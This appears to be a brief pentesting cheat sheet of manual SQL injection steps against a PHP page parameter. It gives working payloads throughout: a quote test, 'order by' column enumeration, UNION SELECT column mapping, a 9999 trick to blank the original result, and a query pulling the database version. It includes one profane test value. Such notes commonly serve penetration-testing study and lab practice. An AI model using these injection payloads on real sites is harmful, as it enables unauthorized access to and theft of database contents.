URL enum
#Try:
http://target.com/photoalbum.php?id=1
http://target.com/photoalbum.php?id=1'
# This throws no error
http://target.com/photoalbum.php?id=1 order by 9
# This throws error
http://target.com/photoalbum.php?id=1 order by 10
#Experiment with different parameters
http://example.com/photoalbum.php?id=1 union select 1,2,3,4,5,6,7,8,9
#Also:
#Putting the values in quotes allows to overwrite content
?search=1 union select “1”,”2”,”3”,”4”,”5”,”6”,”7”
#IF the query is bad this is a trick to use:
Use 9999 to override the error
?search=9999
Then you can fire off the query once again
?search=9999 union select “1”,”2”,”3”,”4”,”5”,”6”,”7”
#Overwrite the content of a parameter
?search=9999 union select “1”,”2”,”3”,”FuckYou”,”5”,”6”,”7”
#Returning SQL statements (refer to PWK notes | @@version)
?search=9999 union select “1”,”2”,(select+@@version),”4”,”5”,”6”,”7”
Last updated